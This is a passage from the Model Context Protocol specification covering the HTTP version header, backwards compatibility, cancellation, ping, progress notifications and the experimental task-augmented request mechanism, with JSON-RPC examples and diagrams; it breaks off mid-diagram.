If using HTTP, the client **MUST** include the `MCP-Protocol-Version: <protocol-version>` HTTP header on all subsequent requests to the MCP
server, allowing the MCP server to respond based on the MCP protocol version.
For example: `MCP-Protocol-Version: 2025-11-25`
The protocol version sent by the client **SHOULD** be the one [negotiated during
initialization](/specification/2025-11-25/basic/lifecycle#version-negotiation).
For backwards compatibility, if the server does *not* receive an `MCP-Protocol-Version`
header, and has no other way to identify the version - for example, by relying on the
protocol version negotiated during initialization - the server **SHOULD** assume protocol
version `2025-03-26`.
If the server receives a request with an invalid or unsupported
`MCP-Protocol-Version`, it **MUST** respond with `400 Bad Request`.
### Backwards Compatibility
Clients and servers can maintain backwards compatibility with the deprecated [HTTP+SSE
transport](/specification/2024-11-05/basic/transports#http-with-sse) (from
protocol version 2024-11-05) as follows:
**Servers** wanting to support older clients should:
* Continue to host both the SSE and POST endpoints of the old transport, alongside the
new "MCP endpoint" defined for the Streamable HTTP transport.
* It is also possible to combine the old POST endpoint and the new MCP endpoint, but
this may introduce unneeded complexity.
**Clients** wanting to support older servers should:
1. Accept an MCP server URL from the user, which may point to either a server using the
old transport or the new transport.
2. Attempt to POST an `InitializeRequest` to the server URL, with an `Accept` header as
defined above:
* If it succeeds, the client can assume this is a server supporting the new Streamable
HTTP transport.
* If it fails with one of the following HTTP status codes: "400 Bad Request", "404 Not
Found", or "405 Method Not Allowed":
* Issue a GET request to the server URL, expecting that this will open an SSE stream
and return an `endpoint` event as the first event.
* When the `endpoint` event arrives, the client can assume this is a server running
the old HTTP+SSE transport, and should use that transport for all subsequent
communication.
## Custom Transports
Clients and servers **MAY** implement additional custom transport mechanisms to suit
their specific needs. The protocol is transport-agnostic and can be implemented over any
communication channel that supports bidirectional message exchange.
Implementers who choose to support custom transports **MUST** ensure they preserve the
JSON-RPC message format and lifecycle requirements defined by MCP. Custom transports
**SHOULD** document their specific connection establishment and message exchange patterns
to aid interoperability.
# Cancellation
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/cancellation
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) supports optional cancellation of in-progress requests
through notification messages. Either side can send a cancellation notification to
indicate that a previously-issued request should be terminated.
## Cancellation Flow
When a party wants to cancel an in-progress request, it sends a `notifications/cancelled`
notification containing:
* The ID of the request to cancel
* An optional reason string that can be logged or displayed
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/cancelled",
"params": {
"requestId": "123",
"reason": "User requested cancellation"
}
}
```
## Behavior Requirements
1. Cancellation notifications **MUST** only reference requests that:
* Were previously issued in the same direction
* Are believed to still be in-progress
2. The `initialize` request **MUST NOT** be cancelled by clients
3. For [task-augmented requests](./tasks), the `tasks/cancel` request **MUST** be used instead of the `notifications/cancelled` notification. Tasks have their own dedicated cancellation mechanism that returns the final task state (see the sketch after this list).
4. Receivers of cancellation notifications **SHOULD**:
* Stop processing the cancelled request
* Free associated resources
* Not send a response for the cancelled request
5. Receivers **MAY** ignore cancellation notifications if:
* The referenced request is unknown
* Processing has already completed
* The request cannot be cancelled
6. The sender of the cancellation notification **SHOULD** ignore any response to the
request that arrives afterward
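Per requirement 3 above, cancelling a task-augmented request uses a dedicated request rather than a notification. A minimal sketch, assuming the `taskId` parameter defined by the tasks specification:
```json theme={null}
{
  "jsonrpc": "2.0",
  "id": 42,
  "method": "tasks/cancel",
  "params": {
    "taskId": "task-00a33e35"
  }
}
```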
## Timing Considerations
Due to network latency, cancellation notifications may arrive after request processing
has completed, and potentially after a response has already been sent.
Both parties **MUST** handle these race conditions gracefully:
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Client->>Server: Request (ID: 123)
Note over Server: Processing starts
Client--)Server: notifications/cancelled (ID: 123)
alt
Note over Server: Processing may have completed before cancellation arrives
else If not completed
Note over Server: Stop processing
end
```
## Implementation Notes
* Both parties **SHOULD** log cancellation reasons for debugging
* Application UIs **SHOULD** indicate when cancellation is requested
## Error Handling
Invalid cancellation notifications **SHOULD** be ignored:
* Unknown request IDs
* Already completed requests
* Malformed notifications
This maintains the "fire and forget" nature of notifications while allowing for race
conditions in asynchronous communication.
# Ping
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/ping
**Protocol Revision**: 2025-11-25
The Model Context Protocol includes an optional ping mechanism that allows either party
to verify that their counterpart is still responsive and the connection is alive.
## Overview
The ping functionality is implemented through a simple request/response pattern. Either
the client or server can initiate a ping by sending a `ping` request.
## Message Format
A ping request is a standard JSON-RPC request with no parameters:
```json theme={null}
{
"jsonrpc": "2.0",
"id": "123",
"method": "ping"
}
```
## Behavior Requirements
1. The receiver **MUST** respond promptly with an empty response:
```json theme={null}
{
"jsonrpc": "2.0",
"id": "123",
"result": {}
}
```
2. If no response is received within a reasonable timeout period, the sender **MAY**:
* Consider the connection stale
* Terminate the connection
* Attempt reconnection procedures
## Usage Patterns
```mermaid theme={null}
sequenceDiagram
participant Sender
participant Receiver
Sender->>Receiver: ping request
Receiver->>Sender: empty response
```
## Implementation Considerations
* Implementations **SHOULD** periodically issue pings to detect connection health
* The frequency of pings **SHOULD** be configurable
* Timeouts **SHOULD** be appropriate for the network environment
* Excessive pinging **SHOULD** be avoided to reduce network overhead
## Error Handling
* Timeouts **SHOULD** be treated as connection failures
* Multiple failed pings **MAY** trigger connection reset
* Implementations **SHOULD** log ping failures for diagnostics
# Progress
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/progress
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) supports optional progress tracking for long-running
operations through notification messages. Either side can send progress notifications to
provide updates about operation status.
## Progress Flow
When a party wants to *receive* progress updates for a request, it includes a
`progressToken` in the request metadata.
* Progress tokens **MUST** be a string or integer value
* Progress tokens can be chosen by the sender using any means, but **MUST** be unique
across all active requests.
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "some_method",
"params": {
"_meta": {
"progressToken": "abc123"
}
}
}
```
The receiver **MAY** then send progress notifications containing:
* The original progress token
* The current progress value so far
* An optional "total" value
* An optional "message" value
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/progress",
"params": {
"progressToken": "abc123",
"progress": 50,
"total": 100,
"message": "Reticulating splines..."
}
}
```
* The `progress` value **MUST** increase with each notification, even if the total is
unknown.
* The `progress` and the `total` values **MAY** be floating point.
* The `message` field **SHOULD** provide relevant human readable progress information.
## Behavior Requirements
1. Progress notifications **MUST** only reference tokens that:
* Were provided in an active request
* Are associated with an in-progress operation
2. Receivers of progress requests **MAY**:
* Choose not to send any progress notifications
* Send notifications at whatever frequency they deem appropriate
* Omit the total value if unknown
3. For [task-augmented requests](./tasks), the `progressToken` provided in the original request **MUST** continue to be used for progress notifications throughout the task's lifetime, even after the `CreateTaskResult` has been returned. The progress token remains valid and associated with the task until the task reaches a terminal status.
* Progress notifications for tasks **MUST** use the same `progressToken` that was provided in the initial task-augmented request
* Progress notifications for tasks **MUST** stop after the task reaches a terminal status (`completed`, `failed`, or `cancelled`)
```mermaid theme={null}
sequenceDiagram
participant Sender
participant Receiver
Note over Sender,Receiver: Request with progress token
Sender->>Receiver: Method request with progressToken
Note over Sender,Receiver: Progress updates
Receiver-->>Sender: Progress notification (0.2/1.0)
Receiver-->>Sender: Progress notification (0.6/1.0)
Receiver-->>Sender: Progress notification (1.0/1.0)
Note over Sender,Receiver: Operation complete
Receiver->>Sender: Method response
```
## Implementation Notes
* Senders and receivers **SHOULD** track active progress tokens
* Both parties **SHOULD** implement rate limiting to prevent flooding
* Progress notifications **MUST** stop after completion
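As a rough receiver-side sketch of these rules, the class below tracks a single progress token, enforces monotonically increasing values, rate-limits notifications, and stops reporting after completion. The `send_notification` function is a hypothetical transport helper.

```python theme={null}
import time

# Hypothetical transport helper: sends a JSON-RPC notification (no response).
def send_notification(method: str, params: dict) -> None: ...

class ProgressReporter:
    """Emits notifications/progress for a single active progressToken."""

    def __init__(self, token: str | int, min_interval: float = 0.25):
        self.token = token
        self.min_interval = min_interval  # simple rate limit between notifications
        self._last_sent = 0.0
        self._last_progress = float("-inf")
        self._done = False

    def report(self, progress: float, total: float | None = None,
               message: str | None = None) -> None:
        if self._done or progress <= self._last_progress:
            return  # values must increase; nothing is sent after completion
        now = time.monotonic()
        if now - self._last_sent < self.min_interval:
            return  # drop over-frequent updates to avoid flooding
        params: dict = {"progressToken": self.token, "progress": progress}
        if total is not None:
            params["total"] = total
        if message is not None:
            params["message"] = message
        send_notification("notifications/progress", params)
        self._last_progress = progress
        self._last_sent = now

    def complete(self) -> None:
        self._done = True  # stop reporting once the operation finishes
```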
# Tasks
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/utilities/tasks
**Protocol Revision**: 2025-11-25
Tasks were introduced in version 2025-11-25 of the MCP specification and are currently considered **experimental**.
The design and behavior of tasks may evolve in future protocol versions.
The Model Context Protocol (MCP) allows requestors — which can be either clients or servers, depending on the direction of communication — to augment their requests with **tasks**. Tasks are durable state machines that carry information about the underlying execution state of the request they wrap, and are intended for requestor polling and deferred result retrieval. Each task is uniquely identifiable by a receiver-generated **task ID**.
Tasks are useful for representing expensive computations and batch processing requests, and integrate seamlessly with external job APIs.
## Definitions
Tasks represent parties as either "requestors" or "receivers," defined as follows:
* **Requestor:** The sender of a task-augmented request. This can be the client or the server — either can create tasks.
* **Receiver:** The receiver of a task-augmented request, and the entity executing the task. This can be the client or the server — either can receive and execute tasks.
## User Interaction Model
Tasks are designed to be **requestor-driven**: requestors are responsible for augmenting requests with tasks and for polling for the results of those tasks; meanwhile, receivers tightly control which requests (if any) support task-based execution and manage the lifecycles of those tasks.
This requestor-driven approach ensures deterministic response handling and enables sophisticated patterns such as dispatching concurrent requests, which only the requestor has sufficient context to orchestrate.
Implementations are free to expose tasks through any interface pattern that suits their needs — the protocol itself does not mandate any specific user interaction model.
## Capabilities
Servers and clients that support task-augmented requests **MUST** declare a `tasks` capability during initialization. The `tasks` capability is structured by request category, with boolean properties indicating which specific request types support task augmentation.
### Server Capabilities
Servers declare if they support tasks, and if so, which server-side requests can be augmented with tasks.
| Capability | Description |
| --------------------------- | ---------------------------------------------------- |
| `tasks.list` | Server supports the `tasks/list` operation |
| `tasks.cancel` | Server supports the `tasks/cancel` operation |
| `tasks.requests.tools.call` | Server supports task-augmented `tools/call` requests |
```json theme={null}
{
"capabilities": {
"tasks": {
"list": {},
"cancel": {},
"requests": {
"tools": {
"call": {}
}
}
}
}
}
```
### Client Capabilities
Clients declare if they support tasks, and if so, which client-side requests can be augmented with tasks.
| Capability | Description |
| --------------------------------------- | ---------------------------------------------------------------- |
| `tasks.list` | Client supports the `tasks/list` operation |
| `tasks.cancel` | Client supports the `tasks/cancel` operation |
| `tasks.requests.sampling.createMessage` | Client supports task-augmented `sampling/createMessage` requests |
| `tasks.requests.elicitation.create` | Client supports task-augmented `elicitation/create` requests |
```json theme={null}
{
"capabilities": {
"tasks": {
"list": {},
"cancel": {},
"requests": {
"sampling": {
"createMessage": {}
},
"elicitation": {
"create": {}
}
}
}
}
}
```
### Capability Negotiation
During the initialization phase, both parties exchange their `tasks` capabilities to establish which operations support task-based execution. Requestors **SHOULD** only augment requests with a task if the corresponding capability has been declared by the receiver.
For example, if a server's capabilities include `tasks.requests.tools.call: {}`, then clients may augment `tools/call` requests with a task. If a client's capabilities include `tasks.requests.sampling.createMessage: {}`, then servers may augment `sampling/createMessage` requests with a task.
If `capabilities.tasks` is not defined, the peer **SHOULD NOT** attempt to create tasks during requests.
The set of capabilities in `capabilities.tasks.requests` is exhaustive. If a request type is not present, it does not support task augmentation.
`capabilities.tasks.list` controls if the `tasks/list` operation is supported by the party.
`capabilities.tasks.cancel` controls if the `tasks/cancel` operation is supported by the party.
### Tool-Level Negotiation
Tool calls are given special consideration for the purpose of task augmentation. In the result of `tools/list`, tools declare support for tasks via `execution.taskSupport`, which, if present, can have a value of `"required"`, `"optional"`, or `"forbidden"`.
This is to be interpreted as a fine-grained layer in addition to capabilities, following these rules:
1. If a server's capabilities do not include `tasks.requests.tools.call`, then clients **MUST NOT** attempt to use task augmentation on that server's tools, regardless of the `execution.taskSupport` value.
2. If a server's capabilities include `tasks.requests.tools.call`, then clients consider the value of `execution.taskSupport`, and handle it accordingly:
1. If `execution.taskSupport` is not present or `"forbidden"`, clients **MUST NOT** attempt to invoke the tool as a task. Servers **SHOULD** return a `-32601` (Method not found) error if a client attempts to do so. This is the default behavior.
2. If `execution.taskSupport` is `"optional"`, clients **MAY** invoke the tool as a task or as a normal request.
3. If `execution.taskSupport` is `"required"`, clients **MUST** invoke the tool as a task. Servers **MUST** return a `-32601` (Method not found) error if a client does not attempt to do so.
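A minimal sketch of these rules, assuming `server_capabilities` is the capabilities object exchanged during initialization and `tool` is an entry from a `tools/list` result (shapes follow the JSON examples in this section):

```python theme={null}
def task_mode_for_tool(server_capabilities: dict, tool: dict) -> str:
    """Returns 'forbidden', 'optional', or 'required' for task augmentation."""
    tasks = server_capabilities.get("tasks", {})
    if "call" not in tasks.get("requests", {}).get("tools", {}):
        # Rule 1: without tasks.requests.tools.call, never augment,
        # regardless of the per-tool declaration.
        return "forbidden"
    # Rule 2: defer to execution.taskSupport; absence means forbidden.
    return tool.get("execution", {}).get("taskSupport", "forbidden")
```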
## Protocol Messages
### Creating Tasks
Task-augmented requests follow a two-phase response pattern that differs from normal requests:
* **Normal requests**: The server processes the request and returns the actual operation result directly.
* **Task-augmented requests**: The server accepts the request and immediately returns a `CreateTaskResult` containing task data. The actual operation result becomes available later through `tasks/result` after the task completes.
To create a task, requestors send a request with the `task` field included in the request params. Requestors **MAY** include a `ttl` value indicating the desired task lifetime (in milliseconds), measured from the task's creation.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "get_weather",
"arguments": {
"city": "New York"
},
"task": {
"ttl": 60000
}
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"statusMessage": "The operation is now in progress.",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 60000,
"pollInterval": 5000
}
}
}
```
When a receiver accepts a task-augmented request, it returns a [`CreateTaskResult`](/specification/2025-11-25/schema#createtaskresult) containing task data. The response does not include the actual operation result. The actual result (e.g., tool result for `tools/call`) becomes available only through `tasks/result` after the task completes.
When a task is created in response to a `tools/call` request, host applications may wish to return control to the model while the task is executing. This allows the model to continue processing other requests or perform additional work while waiting for the task to complete.
To support this pattern, servers can provide an optional `io.modelcontextprotocol/model-immediate-response` key in the `_meta` field of the `CreateTaskResult`. The value of this key should be a string intended to be passed as an immediate tool result to the model.
If a server does not provide this field, the host application can fall back to its own predefined message.
This guidance is non-binding and is provisional logic intended to account for the specific use case. This behavior may be formalized or modified as part of `CreateTaskResult` in future protocol versions.
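To make the two-phase pattern concrete, here is a hedged requestor-side sketch that creates the task from the example above and falls back to a host-defined message when the optional immediate-response key is absent. `send_request` is the same hypothetical transport helper used in earlier sketches.

```python theme={null}
# Hypothetical transport helper: sends a JSON-RPC request and returns its result.
async def send_request(method: str, params: dict | None = None) -> dict: ...

async def start_weather_task() -> dict:
    result = await send_request("tools/call", {
        "name": "get_weather",
        "arguments": {"city": "New York"},
        "task": {"ttl": 60_000},  # requested retention from creation, in milliseconds
    })
    task = result["task"]  # CreateTaskResult carries task data, not the tool result
    # Optional string for the model; fall back to a host-defined message if absent.
    immediate = result.get("_meta", {}).get(
        "io.modelcontextprotocol/model-immediate-response",
        "The task was started; results will be retrieved when it completes.",
    )
    print(immediate)
    return task
```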
### Getting Tasks
In the Streamable HTTP (SSE) transport, clients **MAY** disconnect from an SSE stream opened by the server in response to a `tasks/get` request at any time.
While this note is not prescriptive regarding the specific usage of SSE streams, all implementations **MUST** continue to comply with the existing [Streamable HTTP transport specification](../transports#sending-messages-to-the-server).
Requestors poll for task completion by sending [`tasks/get`](/specification/2025-11-25/schema#tasks%2Fget) requests.
Requestors **SHOULD** respect the `pollInterval` provided in responses when determining polling frequency.
Requestors **SHOULD** continue polling until the task reaches a terminal status (`completed`, `failed`, or `cancelled`), or until encountering the [`input_required`](#input-required-status) status. Note that invoking `tasks/result` does not imply that the requestor needs to stop polling; requestors **SHOULD** continue polling the task status via `tasks/get` if they are not actively waiting for `tasks/result` to complete.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "tasks/get",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"statusMessage": "The operation is now in progress.",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"pollInterval": 5000
}
}
```
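A minimal polling sketch following these rules, again assuming the hypothetical `send_request` helper; it respects `pollInterval` and stops at a terminal or `input_required` status:

```python theme={null}
import asyncio

# Hypothetical transport helper, as in earlier sketches.
async def send_request(method: str, params: dict | None = None) -> dict: ...

TERMINAL_STATUSES = {"completed", "failed", "cancelled"}

async def poll_task(task_id: str) -> dict:
    """Polls tasks/get until the task is terminal or requires input."""
    while True:
        task = await send_request("tasks/get", {"taskId": task_id})
        if task["status"] in TERMINAL_STATUSES or task["status"] == "input_required":
            return task
        # Respect the receiver-suggested pollInterval (milliseconds) when provided.
        await asyncio.sleep(task.get("pollInterval", 5000) / 1000)
```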
### Retrieving Task Results
In the Streamable HTTP (SSE) transport, clients **MAY** disconnect from an SSE stream opened by the server in response to a `tasks/result` request at any time.
While this note is not prescriptive regarding the specific usage of SSE streams, all implementations **MUST** continue to comply with the existing [Streamable HTTP transport specification](../transports#sending-messages-to-the-server).
After a task completes, the operation result is retrieved via [`tasks/result`](/specification/2025-11-25/schema#tasks%2Fresult). This is distinct from the initial `CreateTaskResult` response, which contains only task data. The result structure matches the original request type (e.g., `CallToolResult` for `tools/call`).
To retrieve the result of a completed task, requestors can send a `tasks/result` request:
While `tasks/result` blocks until the task reaches a terminal status, requestors can continue polling via `tasks/get` in parallel if they are not actively blocked waiting for the result, such as if their previous `tasks/result` request failed or was cancelled. This allows requestors to monitor status changes or display progress updates while the task executes, even after invoking `tasks/result`.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "tasks/result",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in New York:\nTemperature: 72°F\nConditions: Partly cloudy"
}
],
"isError": false,
"_meta": {
"io.modelcontextprotocol/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
### Task Status Notification
When a task status changes, receivers **MAY** send a [`notifications/tasks/status`](/specification/2025-11-25/schema#notifications%2Ftasks%2Fstatus) notification to inform the requestor of the change. This notification includes the full task state.
**Notification:**
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tasks/status",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "completed",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:50:00Z",
"ttl": 60000,
"pollInterval": 5000
}
}
```
The notification includes the full [`Task`](/specification/2025-11-25/schema#task) object, including the updated `status` and `statusMessage` (if present). This allows requestors to access the complete task state without making an additional `tasks/get` request.
Requestors **MUST NOT** rely on receiving this notification, as it is optional. Receivers are not required to send status notifications and may choose to send them only for certain status transitions. Requestors **SHOULD** continue to poll via `tasks/get` to ensure they receive status updates.
### Listing Tasks
To retrieve a list of tasks, requestors can send a [`tasks/list`](/specification/2025-11-25/schema#tasks%2Flist) request. This operation supports pagination.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"method": "tasks/list",
"params": {
"cursor": "optional-cursor-value"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 5,
"result": {
"tasks": [
{
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "working",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"pollInterval": 5000
},
{
"taskId": "abc123-def456-ghi789",
"status": "completed",
"createdAt": "2025-11-25T09:15:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 60000
}
],
"nextCursor": "next-page-cursor"
}
}
```
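A cursor-pagination sketch under the same assumptions as the earlier examples; note that the cursor is treated as an opaque token:

```python theme={null}
# Hypothetical transport helper, as in earlier sketches.
async def send_request(method: str, params: dict | None = None) -> dict: ...

async def list_all_tasks() -> list[dict]:
    """Follows nextCursor pages until the receiver stops returning one."""
    tasks: list[dict] = []
    cursor: str | None = None
    while True:
        result = await send_request("tasks/list", {"cursor": cursor} if cursor else {})
        tasks.extend(result["tasks"])
        cursor = result.get("nextCursor")  # opaque token: never parsed or modified
        if not cursor:
            return tasks
```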
### Cancelling Tasks
To explicitly cancel a task, requestors can send a [`tasks/cancel`](/specification/2025-11-25/schema#tasks%2Fcancel) request.
**Request:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"method": "tasks/cancel",
"params": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
**Response:**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 6,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "cancelled",
"statusMessage": "The task was cancelled by request.",
"createdAt": "2025-11-25T10:30:00Z",
"lastUpdatedAt": "2025-11-25T10:40:00Z",
"ttl": 30000,
"pollInterval": 5000
}
}
```
## Behavior Requirements
These requirements apply to all parties that support receiving task-augmented requests.
### Task Support and Handling
1. Receivers that do not declare the task capability for a request type **MUST** process requests of that type normally, ignoring any task-augmentation metadata if present.
2. Receivers that declare the task capability for a request type **MAY** return an error for non-task-augmented requests, requiring requestors to use task augmentation.
### Task ID Requirements
1. Task IDs **MUST** be a string value.
2. Task IDs **MUST** be generated by the receiver when creating a task.
3. Task IDs **MUST** be unique among all tasks controlled by the receiver.
### Task Status Lifecycle
1. Tasks **MUST** begin in the `working` status when created.
2. Receivers **MUST** only transition tasks through the following valid paths:
1. From `working`: may move to `input_required`, `completed`, `failed`, or `cancelled`
2. From `input_required`: may move to `working`, `completed`, `failed`, or `cancelled`
3. Tasks with a `completed`, `failed`, or `cancelled` status are in a terminal state and **MUST NOT** transition to any other status
**Task Status State Diagram:**
```mermaid theme={null}
stateDiagram-v2
[*] --> working
working --> input_required
working --> terminal
input_required --> working
input_required --> terminal
terminal --> [*]
note right of terminal
Terminal states:
• completed
• failed
• cancelled
end note
```
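A receiver-side guard implementing exactly these transitions might look like the following sketch:

```python theme={null}
TERMINAL_STATUSES = {"completed", "failed", "cancelled"}
VALID_TRANSITIONS = {
    "working": {"input_required"} | TERMINAL_STATUSES,
    "input_required": {"working"} | TERMINAL_STATUSES,
}

def transition(task: dict, new_status: str) -> None:
    """Applies a status change only along the valid lifecycle paths."""
    current = task["status"]
    if current in TERMINAL_STATUSES:
        raise ValueError(f"task is terminal ({current}); no further transitions")
    if new_status not in VALID_TRANSITIONS[current]:
        raise ValueError(f"invalid transition: {current} -> {new_status}")
    task["status"] = new_status
```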
### Input Required Status
With the Streamable HTTP (SSE) transport, servers often close SSE streams after delivering a response message, which can lead to ambiguity regarding the stream used for subsequent task messages.
Servers can handle this by enqueueing task-related messages and delivering them to the client as a side channel alongside other responses.
Servers have flexibility in how they manage SSE streams during task polling and result retrieval, and clients **SHOULD** expect messages to be delivered on any SSE stream, including the HTTP GET stream.
One possible approach is maintaining an SSE stream on `tasks/result` (see notes on the `input_required` status).
Where possible, servers **SHOULD NOT** upgrade to an SSE stream in response to a `tasks/get` request, as the client has indicated it wishes to poll for a result.
While this note is not prescriptive regarding the specific usage of SSE streams, all implementations **MUST** continue to comply with the existing [Streamable HTTP transport specification](../transports#sending-messages-to-the-server).
1. When the task receiver has messages for the requestor that are necessary to complete the task, the receiver **SHOULD** move the task to the `input_required` status.
2. The receiver **MUST** include the `io.modelcontextprotocol/related-task` metadata in each such request to associate it with the task.
3. When the requestor encounters the `input_required` status, it **SHOULD** preemptively call `tasks/result`.
4. When the receiver receives all required input, the task **SHOULD** transition out of `input_required` status (typically back to `working`).
### TTL and Resource Management
1. Receivers **MUST** include a `createdAt` [ISO 8601](https://datatracker.ietf.org/doc/html/rfc3339#section-5)-formatted timestamp in all task responses to indicate when the task was created.
2. Receivers **MUST** include a `lastUpdatedAt` [ISO 8601](https://datatracker.ietf.org/doc/html/rfc3339#section-5)-formatted timestamp in all task responses to indicate when the task was last updated.
3. Receivers **MAY** override the requested `ttl` duration.
4. Receivers **MUST** include the actual `ttl` duration (or `null` for unlimited) in `tasks/get` responses.
5. After a task's `ttl` lifetime has elapsed, receivers **MAY** delete the task and its results, regardless of the task status.
6. Receivers **MAY** include a `pollInterval` value (in milliseconds) in `tasks/get` responses to suggest polling intervals. Requestors **SHOULD** respect this value when provided.
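For illustration, a receiver might expire tasks with a sweep like the sketch below, which deletes tasks whose `ttl` (relative to `createdAt`) has elapsed. The in-memory `tasks` dict is an assumption made for the example.

```python theme={null}
from datetime import datetime, timedelta, timezone

def sweep_expired(tasks: dict[str, dict]) -> None:
    """Deletes tasks whose ttl (milliseconds from createdAt) has elapsed."""
    now = datetime.now(timezone.utc)
    for task_id, task in list(tasks.items()):
        ttl = task.get("ttl")
        if ttl is None:
            continue  # a null ttl means unlimited retention
        created = datetime.fromisoformat(task["createdAt"].replace("Z", "+00:00"))
        if now - created > timedelta(milliseconds=ttl):
            del tasks[task_id]  # expiry applies regardless of task status
```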
### Result Retrieval
1. Receivers that accept a task-augmented request **MUST** return a `CreateTaskResult` as the response. This result **SHOULD** be returned as soon as possible after accepting the task.
2. When a receiver receives a `tasks/result` request for a task in a terminal status (`completed`, `failed`, or `cancelled`), it **MUST** return the final result of the underlying request, whether that is a successful result or a JSON-RPC error.
3. When a receiver receives a `tasks/result` request for a task in any other non-terminal status (`working` or `input_required`), it **MUST** block the response until the task reaches a terminal status.
4. For tasks in a terminal status, receivers **MUST** return from `tasks/result` exactly what the underlying request would have returned, whether that is a successful result or a JSON-RPC error.
### Associating Task-Related Messages
1. All requests, notifications, and responses related to a task **MUST** include the `io.modelcontextprotocol/related-task` key in their `_meta` field, with the value set to an object with a `taskId` matching the associated task ID.
1. For example, an elicitation that a task-augmented tool call depends on **MUST** share the same related task ID with that tool call's task.
2. For the `tasks/get`, `tasks/result`, and `tasks/cancel` operations, the `taskId` parameter in the request **MUST** be used as the source of truth for identifying the target task. Requestors **SHOULD NOT** include `io.modelcontextprotocol/related-task` metadata in these requests, and receivers **MUST** ignore such metadata if present in favor of the RPC method parameter.
Similarly, for the `tasks/get`, `tasks/list`, and `tasks/cancel` operations, receivers **SHOULD NOT** include `io.modelcontextprotocol/related-task` metadata in the result messages, as the `taskId` is already present in the response structure.
### Task Notifications
1. Receivers **MAY** send `notifications/tasks/status` notifications when a task's status changes.
2. Requestors **MUST NOT** rely on receiving the `notifications/tasks/status` notification, as it is optional.
3. When sent, the `notifications/tasks/status` notification **SHOULD NOT** include the `io.modelcontextprotocol/related-task` metadata, as the task ID is already present in the notification parameters.
### Task Progress Notifications
Task-augmented requests support progress notifications as defined in the [progress](./progress) specification. The `progressToken` provided in the initial request remains valid throughout the task lifetime.
### Task Listing
1. Receivers **SHOULD** use cursor-based pagination to limit the number of tasks returned in a single response.
2. Receivers **MUST** include a `nextCursor` in the response if more tasks are available.
3. Requestors **MUST** treat cursors as opaque tokens and not attempt to parse or modify them.
4. If a task is retrievable via `tasks/get` for a requestor, it **MUST** be retrievable via `tasks/list` for that requestor.
### Task Cancellation
1. Receivers **MUST** reject cancellation requests for tasks already in a terminal status (`completed`, `failed`, or `cancelled`) with error code `-32602` (Invalid params).
2. Upon receiving a valid cancellation request, receivers **SHOULD** attempt to stop the task execution and **MUST** transition the task to `cancelled` status before sending the response.
3. Once a task is cancelled, it **MUST** remain in `cancelled` status even if execution continues to completion or fails.
4. The `tasks/cancel` operation does not define deletion behavior. However, receivers **MAY** delete cancelled tasks at their discretion at any time, including immediately after cancellation or after the task `ttl` expires.
5. Requestors **SHOULD NOT** rely on cancelled tasks being retained for any specific duration and should retrieve any needed information before cancelling.
## Message Flow
### Basic Task Lifecycle
```mermaid theme={null}
sequenceDiagram
participant C as Client (Requestor)
participant S as Server (Receiver)
Note over C,S: 1. Task Creation
C->>S: Request with task field (ttl)
activate S
S->>C: CreateTaskResult (taskId, status: working, ttl, pollInterval)
deactivate S
Note over C,S: 2. Task Polling
C->>S: tasks/get (taskId)
activate S
S->>C: working
deactivate S
Note over S: Task processing continues...
C->>S: tasks/get (taskId)
activate S
S->>C: working
deactivate S
Note over S: Task completes
C->>S: tasks/get (taskId)
activate S
S->>C: completed
deactivate S
Note over C,S: 3. Result Retrieval
C->>S: tasks/result (taskId)
activate S
S->>C: Result content
deactivate S
Note over C,S: 4. Cleanup
Note over S: After ttl period from creation, task is cleaned up
```
### Task-Augmented Tool Call With Elicitation
```mermaid theme={null}
sequenceDiagram
participant U as User
participant LLM
participant C as Client (Requestor)
participant S as Server (Receiver)
Note over LLM,C: LLM initiates request
LLM->>C: Request operation
Note over C,S: Client augments with task
C->>S: tools/call (ttl: 3600000)
activate S
S->>C: CreateTaskResult (task-123, status: working)
deactivate S
Note over LLM,C: Client continues processing other requests while task executes in background
LLM->>C: Request other operation
C->>LLM: Other operation result
Note over C,S: Client polls for status
C->>S: tasks/get (task-123)
activate S
